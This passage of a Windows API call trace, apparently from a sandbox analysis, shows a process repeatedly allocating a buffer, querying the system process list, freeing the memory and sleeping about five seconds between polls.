Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.240] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.241] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.247] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.249] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.250] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.253] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.254] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.256] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.256] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.260] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.261] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.269] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.271] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.274] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.275] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.278] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.282] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.284] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.288] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.289] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.291] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.292] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.296] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.298] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.299] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.303] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.303] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.305] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.305] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.305] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.309] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.310] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.311] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.312] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.315] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.316] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.318] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.318] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.323] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.330] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.336] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.338] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.338] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.339] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.339] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.342] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.342] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.344] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.345] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.345] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.348] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.349] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.358] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.361] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.361] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.365] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.365] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.368] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.368] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.372] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.374] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.374] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.374] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.374] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.374] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.378] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.379] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.380] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.381] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.381] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.384] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.385] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) 